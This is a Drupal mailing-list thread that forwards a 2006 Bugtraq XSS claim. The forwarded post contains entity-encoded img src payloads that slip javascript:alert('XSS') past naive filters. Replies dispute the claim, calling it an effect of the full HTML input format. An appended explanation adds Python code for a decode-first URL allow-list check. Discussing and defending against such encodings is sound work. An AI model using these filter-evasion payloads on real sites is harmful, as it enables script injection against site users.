[liz0@bsdmail.com: Drupal all versiyon xss cehennem.org]
This is from bugtraq...
-- Piotrek irc: #debian.pl Mors Drosophilis melanogastribus!
I tried to reproduce this, but was unable to... anyone else have any luck?
On Tue, 2006-01-03 at 21:08 +0100, Piotr Krukowiecki wrote:
This is from bugtraq...
email message attachment
-------- Forwarded Message -------- From: liz0@bsdmail.com To: bugtraq@securityfocus.com Subject: Drupal all versiyon xss cehennem.org Date: 2 Jan 2006 10:45:25 -0000
Drupal all versions XSS
----------------------------------------------------
site: http://www.drupal.org
Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php
--------------------------------------------------
img tag : on
-----------------------------------------------------------
Decimal Value: HTML (without semicolons)
<img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41> = <img src=javascript:alert('XSS')>
-----------------------------------------------------------
Decimal Value: HTML (with semicolons)
<img src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> = <img src=javascript:alert('XSS')>
-----------------------------------------------------------
example: post message: <img src=javascript:alert('XSS')> not vulnerable, but <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41> vulnerable
post message: <img src=javascript:alert('XSS')> not vulnerable, but <img src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> vulnerable
---------------------------------------------------------
Credit: Liz0ziM mail: liz0@bsdmail.com www.biyo.tk , www.cehennem.org
Greetz: wannacut, The_Bekir, Codexploder'tq, furtivo, R00t3rr0r, disconnect, cyberlord and all friends
-----------------------------------------------------------
Source: http://liz0zim.no-ip.org/drupal.txt
------------------------------------------------------------
As chx pointed out on bugtraq, and on this list, this is not a vulnerability but a 'feature': allowing full HTML in posting means what it says. Let's kill this topic.
On 4-Jan-2006, at 1:37 PM, Darrel O'Pry wrote:
I tried to reproduce this, but was unable to... anyone else have any luck?
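The trick in the forwarded advisory is that the browser decodes decimal character references inside an attribute value, with or without the trailing semicolon, so a filter that only looks for the literal string "javascript:" in the raw markup never sees it; chx's point is that Drupal's full HTML input format applies no such filter at all, so nothing is being bypassed there. The following is an added example, not code from this thread or from Drupal, contrasting that naive substring check with one that decodes references first and then allow-lists the URL scheme. The function names, the ALLOWED_SCHEMES set and the sample tags are assumptions constructed for illustration.

```python
import html
import re

# Constructed sample, modelled on the forwarded advisory: the javascript: URL
# that the advisory places in an unquoted <img src=...> attribute.
PAYLOAD = "javascript:alert('XSS')"


def decimal_entities(text, semicolons=True):
    """Encode every character of text as a decimal character reference.

    semicolons=False drops the trailing ';', the advisory's second variant;
    browsers still decode such references inside attribute values.
    """
    sep = ";" if semicolons else ""
    return "".join(f"&#{ord(c)}{sep}" for c in text)


def img_tag(src):
    """Build the unquoted <img src=...> tag the advisory posts (constructed)."""
    return f"<img src={src}>"


# src attribute, whether double-quoted, single-quoted or bare.
_SRC = re.compile(r"""src\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.I)


def src_of(tag):
    """Return the raw (still entity-encoded) src value of an <img> tag."""
    m = _SRC.search(tag)
    if not m:
        return ""
    return next(g for g in m.groups() if g is not None)


def naive_is_safe_url(raw):
    """The kind of check the advisory bypasses: a substring test on raw markup."""
    return "javascript:" not in raw.lower()


_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.I)
ALLOWED_SCHEMES = {"http", "https", "ftp", "mailto"}  # assumed allow-list


def hardened_is_safe_url(raw):
    """Decode first, then allow-list the scheme.

    html.unescape resolves decimal and hex references with or without the
    trailing ';' (and named entities such as &colon;), so both advisory
    variants collapse back to the literal javascript: URL. Whitespace and
    control characters, which browsers ignore inside a scheme, are stripped
    before the scheme is read, so "java\\tscript:" is caught too.
    """
    decoded = html.unescape(raw)
    decoded = re.sub(r"[\x00-\x20]", "", decoded)
    m = _SCHEME.match(decoded)
    if not m:
        return True  # relative URL: no scheme at all
    return m.group(1).lower() in ALLOWED_SCHEMES


def evaluate(tag):
    """Return (naive_verdict, hardened_verdict) for one posted <img> tag."""
    raw = src_of(tag)
    return naive_is_safe_url(raw), hardened_is_safe_url(raw)


if __name__ == "__main__":
    for label, src in [
        ("plain", PAYLOAD),
        ("decimal, with semicolons", decimal_entities(PAYLOAD, True)),
        ("decimal, without semicolons", decimal_entities(PAYLOAD, False)),
        ("benign", "http://example.com/pic.png"),
    ]:
        naive, hardened = evaluate(img_tag(src))
        print(f"{label:30} naive_safe={naive!s:5} hardened_safe={hardened}")
```

Both encoded variants pass the naive check and fail the hardened one; the plain tag fails both. Decoding before matching is the part that matters: any filter that inspects markup for dangerous URL schemes has to operate on what the browser will see, not on the bytes the user typed.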
participants (3)
- Darrel O'Pry
- piotr@mallorn.ii.uj.edu.pl
- puregin